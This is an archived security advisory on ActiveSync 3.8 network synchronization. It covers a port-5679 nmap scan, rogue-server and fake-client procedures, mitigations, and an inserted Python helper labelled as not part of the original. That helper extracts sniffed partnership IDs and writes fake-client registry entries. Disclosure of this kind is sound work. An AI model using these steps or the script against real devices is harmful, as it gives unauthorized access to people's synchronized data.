[NT] Microsoft ActiveSync Clear Text Password: msg#00029

Subject: [NT] Microsoft ActiveSync Clear Text Password

The following security advisory is sent to the securiteam mailing list, and can
be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -



Microsoft ActiveSync Clear Text Password
------------------------------------------------------------------------


SUMMARY

<http://www.microsoft.com/windowsmobile/downloads/activesync37.mspx>
Microsoft ActiveSync is "widely used to synchronize Windows-based PDAs
and smartphones with a desktop computer. The PDA can connect to the PC via
COM/USB/IR or LAN. Before synchronization the user on the PC must set up a
"partnership" to allow synchronization. If the PDA is protected with a
password, the user on the PC should provide the password before he can
access the device".

Synchronization over LAN/Wi-Fi has several design weaknesses, among them
that the initial authentication exchange (including the partnership IDs)
is sent in clear text and that the device password is never requested.

DETAILS

Vulnerable Systems:
* ActiveSync version 3.8

1. All data, including the initial "authentication", is transmitted in
clear text. This has no security implication for COM/USB and other
physically protected links; LAN (Wi-Fi in most cases), however, is easy
to sniff, and such communication can be intercepted.

2. Even if the PDA is password protected, ActiveSync does not ask for the
password in the case of network synchronization.

3. ActiveSync does not use any form of authentication for the server (PC)
or the client (PDA), so a rogue server can synchronize with a genuine
client, and a fake client with a genuine server, without difficulty.

You can discover hosts on which ActiveSync LAN synchronization is enabled
by scanning for TCP port 5679:
nmap -p 5679 192.168.0.*

Fake server:
It is easy to build a rogue server without any special software. All that
is required is ActiveSync, a sniffer and a MitM position on the network.

Steps:
1. Install ActiveSync on the rogue server and enable network
synchronization
2. Obtain a MitM position, so that the PDA's traffic to the real PC passes
through the rogue host
3. Launch your favorite sniffer and set a filter to save TCP packets on
port 5679
4. Wait for a PDA connection
5. Open the capture and check the second data packet from the PDA. At
offsets 0x14 and 0x18 you can see the partnership IDs. ActiveSync supports
up to 2 PC partnerships per device and, as you can see, the PDA sends both
IDs in the "handshake"
6. Import the template into the registry and change the key
HKEY_CURRENT_USER\Software\Microsoft\Windows CE
Services\Partners\<Partnership> to the sniffed partnership ID
7. Wait for another connection and check ActiveSync; the device should be
connected as "guest". Even if you get a "Synchronization Error", try
clicking the "Explore" button on the toolbar

Fake Client:
This is very similar to the rogue server, but you don't need a MitM
position to accomplish this attack. All that is needed is the name of the
PC and the corresponding "partnership id".

1. Launch your favorite registry editor for Windows Mobile
2. Navigate to HKLM\Software\Microsoft\Windows CE Services\Partners\P1
3. Create the string value PName = <PC_NAME>
4. Create the DWORD value PId = <partnership id>
5. Launch ActiveSync on the PDA and try to connect. If everything is OK,
synchronization will occur.
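The following script is an added example, not part of the original advisory and not from Microsoft or the researcher. It carries out steps 3 to 5 of the fake-server procedure offline (filter TCP port 5679, take the second payload-carrying packet from the PDA, read the two partnership IDs at offsets 0x14 and 0x18) and then writes the device-side PName/PId entries from steps 2 to 4 of the fake-client procedure as .reg text. The capture is constructed inline. Assumptions the advisory does not state: the IDs are 32-bit little-endian values (Windows CE byte order), an unused second partnership slot reads as 0, and the Windows Mobile registry editor in use can import REGEDIT4-style text.

```python
"""Offline helper for the ActiveSync LAN-sync attack steps in the advisory.

ASSUMPTIONS (not in the advisory): partnership IDs at payload offsets 0x14
and 0x18 are little-endian DWORDs, an empty second slot reads as 0, and
the device registry editor accepts REGEDIT4 text. The capture below is
constructed, not recorded from a real device.
"""
from __future__ import annotations

import struct
from dataclasses import dataclass

ACTIVESYNC_PORT = 5679          # TCP port used for LAN synchronization
PID_OFFSETS = (0x14, 0x18)      # both partnership IDs in the PDA "handshake"
PID_FMT = "<II"                 # ASSUMPTION: two little-endian DWORDs


@dataclass(frozen=True)
class Segment:
    """One TCP segment as a sniffer would hand it over (headers stripped)."""
    src: str
    sport: int
    dst: str
    dport: int
    payload: bytes


def is_activesync(seg: Segment) -> bool:
    """Sniffer filter equivalent of step 3: keep only TCP port 5679."""
    return ACTIVESYNC_PORT in (seg.sport, seg.dport)


def second_pda_data_packet(segments: list[Segment], pda_ip: str) -> Segment:
    """Step 5: the second payload-carrying segment sent by the PDA."""
    from_pda = [s for s in segments
                if is_activesync(s) and s.src == pda_ip and s.payload]
    if len(from_pda) < 2:
        raise ValueError("fewer than two data packets from the PDA so far")
    return from_pda[1]


def extract_partnership_ids(payload: bytes) -> tuple[int, int]:
    """Read both partnership IDs at 0x14 and 0x18; 0 means an empty slot."""
    need = PID_OFFSETS[-1] + 4
    if len(payload) < need:
        raise ValueError(f"payload too short: {len(payload)} < {need} bytes")
    return struct.unpack_from(PID_FMT, payload, PID_OFFSETS[0])


def sniffed_ids(segments: list[Segment], pda_ip: str) -> tuple[int, int]:
    """Steps 3-5 end to end: filter, pick the packet, decode the IDs."""
    return extract_partnership_ids(second_pda_data_packet(segments, pda_ip).payload)


def fake_client_reg(pc_name: str, pid: int) -> str:
    """Fake-client steps 2-4 as REGEDIT4 text for the device's P1 partnership."""
    if not 0 <= pid <= 0xFFFFFFFF:
        raise ValueError("partnership ID must fit a DWORD")
    key = r"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows CE Services\Partners\P1"
    return (
        "REGEDIT4\n\n"
        f"[{key}]\n"
        f'"PName"="{pc_name}"\n'
        f'"PId"=dword:{pid:08x}\n'
    )


def build_capture(pda_ip: str, pc_ip: str, ids: tuple[int, int]) -> list[Segment]:
    """Constructed capture: two PDA packets and one PC reply, for the demo."""
    hello = b"\x00" * 0x10                       # constructed first PDA packet
    body = bytearray(b"\x00" * 0x24)             # constructed second PDA packet
    struct.pack_into(PID_FMT, body, PID_OFFSETS[0], *ids)
    return [
        Segment(pda_ip, 1025, pc_ip, ACTIVESYNC_PORT, hello),
        Segment(pc_ip, ACTIVESYNC_PORT, pda_ip, 1025, b"\x01" * 8),
        Segment(pda_ip, 1025, pc_ip, ACTIVESYNC_PORT, bytes(body)),
    ]


if __name__ == "__main__":
    cap = build_capture("192.168.0.20", "192.168.0.10", (0x1234ABCD, 0))
    first, second = sniffed_ids(cap, "192.168.0.20")
    print(f"partnership IDs: {first:#010x} {second:#010x}")
    print(fake_client_reg("WORKSTATION", first))
```

The first PDA packet in the constructed capture is deliberately shorter than 0x1c bytes, which is why the code selects the second data packet rather than the first, exactly as step 5 says; a real capture would be fed in as `Segment` objects produced by whatever sniffer is used.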

Mitigating factors:
1. LAN synchronization is disabled by default
2. To implement a "fake client" you need to know the partnership ID. It
is hard to guess (a 32-bit value, 2^32 possibilities), but because
ActiveSync accepts 2 partnership IDs per connection, the whole space can
be covered in at most 2^31 connections, so brute force of the ID is not
impossible

ActiveSync should use TLS for authentication of the PC and PDA and for
data encryption. No PKI is needed in this case, because "direct trust" can
be established by exchanging certificates between the PDA and the PC (and
vice versa) when the "partnership" is set up.


ADDITIONAL INFORMATION

The information has been provided by <mailto:Hataha_@xxxxxxxxxx> Natalia
Melnikova.
The original article can be found at:
http://www.securitylab.ru/56278.html
http://www.security.nnov.ru/Fnews64.html



========================================


This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to:
list-unsubscribe@xxxxxxxxxxxxxx
In order to subscribe to the mailing list, simply forward this email to:
list-subscribe@xxxxxxxxxxxxxx


====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any
kind.
In no event shall we be liable for any damages whatsoever including direct,
indirect, incidental, consequential, loss of business profits or special
damages.
